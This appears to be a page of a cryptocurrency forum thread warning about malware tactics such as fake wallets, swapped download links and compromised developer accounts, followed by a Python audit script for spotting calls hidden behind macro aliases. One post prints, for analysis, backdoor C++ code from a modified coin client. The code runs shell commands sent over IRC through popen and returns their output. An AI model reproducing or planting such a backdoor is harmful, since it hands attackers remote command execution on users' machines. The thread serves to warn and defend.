
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 22. (Read 859179 times)

newbie
Activity: 37
Merit: 0
How the hell is the malware editing forum posts? They can only be changed by the participants, though.
newbie
Activity: 88
Merit: 0
I have not seen a reply in a while. Has there been less malware or is this still a major concern?
newbie
Activity: 1022
Merit: 0
As a member of Newbie it is a terrific and discussing matter for me. I think do we need to be beware of increasingly sophisticated malware infection attempts after moving we can also earn easily coin as well bit coin forum help and I hope to block all malware to protect and save our currency.
member
Activity: 124
Merit: 10
This is terrible. I really thank you, because I was almost caught, and now I am starting to install Adblock. I hope to block all the malware from online websites.

I was also nearly caught by those scammers. You can use not only Adblock for this; AdGuard works well too, and blocks more than Adblock, as far as I can see.
newbie
Activity: 98
Merit: 0
Seriously? Is this the state of btcs now? Then I am gonna quit from it.
member
Activity: 471
Merit: 10
Just seeing this. Thanks for the security info. I will try to be careful with any downloads and website visits. Hackers are on the rampage nowadays.
hero member
Activity: 1820
Merit: 775
Somebody took my ether today from MEW. How can that be possible?

Maybe you were connected on the wrong MEW, I mean a fake site. You should follow security instructions from MEW.

DON'T GET PHISHED, please! 🎣 Thank you! 🤗
1. BOOKMARK MYETHERWALLET.COM
2. INSTALL EAL or MetaMask or Cryptonite

newbie
Activity: 112
Merit: 0
Somebody took my ether today from MEW. How can that be possible?
newbie
Activity: 490
Merit: 0
Nowadays a lot of phishing and malware-infected hacking attempts are happening due to bad guys who want to steal your personal information, especially private keys. Blockchain technology is a good technology but it still has a lot of problems that need to be addressed. I want every cryptocurrency wallet to have a two-factor authentication key that works with Google Authenticator.
legendary
Activity: 2156
Merit: 1131
I was thinking if there is a way to automatically delete any malware link post on this forum so that we may not even get to open the link.

You can't detect if a URL is malicious or not.
Either all URLs are banned or people are very careful.
newbie
Activity: 34
Merit: 0
I was thinking if there is a way to automatically delete any malware link post on this forum so that we may not even get to open the link.
newbie
Activity: 69
Merit: 0
Yes I was totally aware of it
full member
Activity: 252
Merit: 100
This is terrible. I really thank you, because I was almost caught, and now I am starting to install Adblock. I hope to block all the malware from online websites.
member
Activity: 328
Merit: 39
Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed :(

Your post made me think in a paranoid way, and I just wondered if we can really trust antimalware software: how can we be sure that THEY don't put something malicious, or don't scan for private keys?

It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.
newbie
Activity: 126
Merit: 0
We need to say thanks to you :) clap clap
newbie
Activity: 21
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }
Here is the source code with macros resolved:
Code:
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and moved my coin out of the wallet and created a new wallet.
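
An added example, not part of the thread or of the coin's source: a small Python audit script that resolves object-like #define aliases and flags call sites that reach a process-spawning function through one, the way CRead hides popen in the quoted backdoor. The #define lines in SAMPLE are constructed from the macro resolution shown in the quote; the watch list and function names are assumptions.

```python
import re

# Assumed watch list: libc calls that spawn a process or shell.
RISKY = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp", "execve"}
DEFINE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(.+?)\s*$')  # object-like macros only

def collect_macros(source):
    """Map each object-like macro name to its replacement text."""
    return {m.group(1): m.group(2)
            for m in map(DEFINE.match, source.splitlines()) if m}

def resolve(name, macros, depth=8):
    """Follow alias chains (A -> B -> popen), bounded to avoid cycles."""
    while name in macros and depth > 0:
        name, depth = macros[name], depth - 1
    return name

def find_hidden_calls(source):
    """Return (line_no, alias, real_function) for risky calls made via an alias."""
    macros = collect_macros(source)
    risky = {n: resolve(n, macros) for n in macros if resolve(n, macros) in RISKY}
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE.match(line):
            continue  # the definition itself is not a call site
        for alias, target in risky.items():
            if re.search(r'\b' + re.escape(alias) + r'\s*\(', line):
                hits.append((no, alias, target))
    return hits

def expand(line, macros):
    """Show a line with aliases resolved (naive: also rewrites inside strings)."""
    return re.sub(r'\b\w+\b', lambda m: resolve(m.group(0), macros), line)

# Constructed sample: the defines are inferred from the resolved code in the quote.
SAMPLE = '''\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) CFree(buf);
}
'''

if __name__ == "__main__":
    macros, lines = collect_macros(SAMPLE), SAMPLE.splitlines()
    for no, alias, target in find_hidden_calls(SAMPLE):
        print(f"line {no}: {alias}() is {target}()")
        print("   ", expand(lines[no - 1], macros).strip())
```

A hit is a prompt for manual review, not a verdict: the question to ask is whether the argument to the resolved call can come from the network, as it does in the quoted code.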
newbie
Activity: 4
Merit: 0
This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
gng
newbie
Activity: 210
Merit: 0
You think faucet sites send malware?
newbie
Activity: 24
Merit: 0
Can't you give anything new? It has been prevailing from very old times in btcs.